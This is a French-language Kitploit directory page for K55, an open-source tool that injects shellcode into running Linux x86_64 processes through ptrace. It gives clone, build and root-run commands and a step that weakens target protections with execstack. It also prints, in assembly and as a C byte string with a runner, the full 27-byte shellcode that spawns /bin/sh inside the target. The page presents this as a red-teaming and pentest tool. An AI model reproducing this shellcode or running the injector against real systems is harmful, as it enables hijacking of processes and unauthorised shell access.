Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
K55 — Utilitaire d'injection de processus Linux x86_64 | Kitploit
Outils/GitHubGitHub/josh0xa/k55
ExploitationShellcodeRed Teaming
GitHubjosh0xa/k55

K55

Utilitaire d'injection de processus Linux x86_64

Voir le dépôt
5913il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

K55 - Utilitaire d'injection de processus Linux x86_64 (C++14)

lisence

À propos de K55

(prononcé : "kay fifty-five")
L'outil d'injection de payload K55 est utilisé pour injecter des charges utiles shellcode x86_64 dans des processus en cours d'exécution. L'utilitaire a été développé en utilisant des techniques modernes C++11 ainsi que quelques fonctions Linux C traditionnelles comme ptrace(). Le shellcode généré dans le processus cible fait 27 octets et exécute /bin/sh (génère un shell bash) dans l'espace d'adressage de la cible. À l'avenir, je permettrai aux utilisateurs de saisir leur propre shellcode via des arguments de ligne de commande.

Installation

  1. git clone https://github.com/josh0xA/K55.git
  2. cd K55
  3. chmod +x build-install.sh
  4. ./build-install.sh

Utilisation de K55

Usage : ./K55 <nom-du-processus>

  • nom-du-processus peut être n'importe quel processus Linux avec les permissions r-xp ou execstack.

Tests

Test 1) Dans un terminal (répertoire K55/), exécutez : ./k55_example_process/k55_test_process
Test 2) Dans un autre terminal, lancez l'injecteur : sudo ./K55 k55_test_process

K55 en action

  • Un shell est généré dans k55_test_process lorsque l'injecteur de shellcode K55 est exécuté (en tant que root).

Injection dans un processus donné

Shell généré dans la cible

Limitations

Évidemment, les appels ptrace(PTRACE_POKETEXT...) ne sont pas les plus discrets. Par conséquent, certaines applications peuvent limiter l'effet de K55. Cependant, pour les tests de sécurité, assurez-vous d'activer execstack pour vos applications cibles. Par exemple, si je teste sur gdb, avant d'injecter, j'exécuterais la commande suivante : sudo execstack -s /usr/bin/gdb. Installez execstack depuis le gestionnaire de paquets de votre distribution. Pour les utilisateurs d'Arch Linux, vous trouverez execstack sur l'AUR.

Fabrication de la charge utile du shell

Remarque : Ce qui suit est une démonstration. La chaîne de payload est déjà codée en dur dans K55.

Implémentation en assembleur de la charge utile (Cité depuis shell-storm (redirection))

root@kitploit:~
main:
    xor eax, eax
    mov rbx, 0xFF978CD091969DD1
    neg rbx
    push rbx
    push rsp
    pop rdi
    cdq
    push rdx
    push rdi
    push rsp
    pop rsi
    mov al, 0x3b
    syscall

Implémentation en C de la charge utile

root@kitploit:~
#include <stdio.h>
#include <string.h>

// Décomposition du shellcode du code assembleur.
char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";

int main()
{
    printf("len:%d bytes\n", strlen(code));
    (*(void(*)()) code)();
    return 0;
}

Références

http://shell-storm.org/shellcode/files/shellcode-806.php
https://0x00sec.org/t/linux-infecting-running-processes/1097

Licence

Licence MIT
Copyright (c) Josh Schiavone

Télécharger l’outil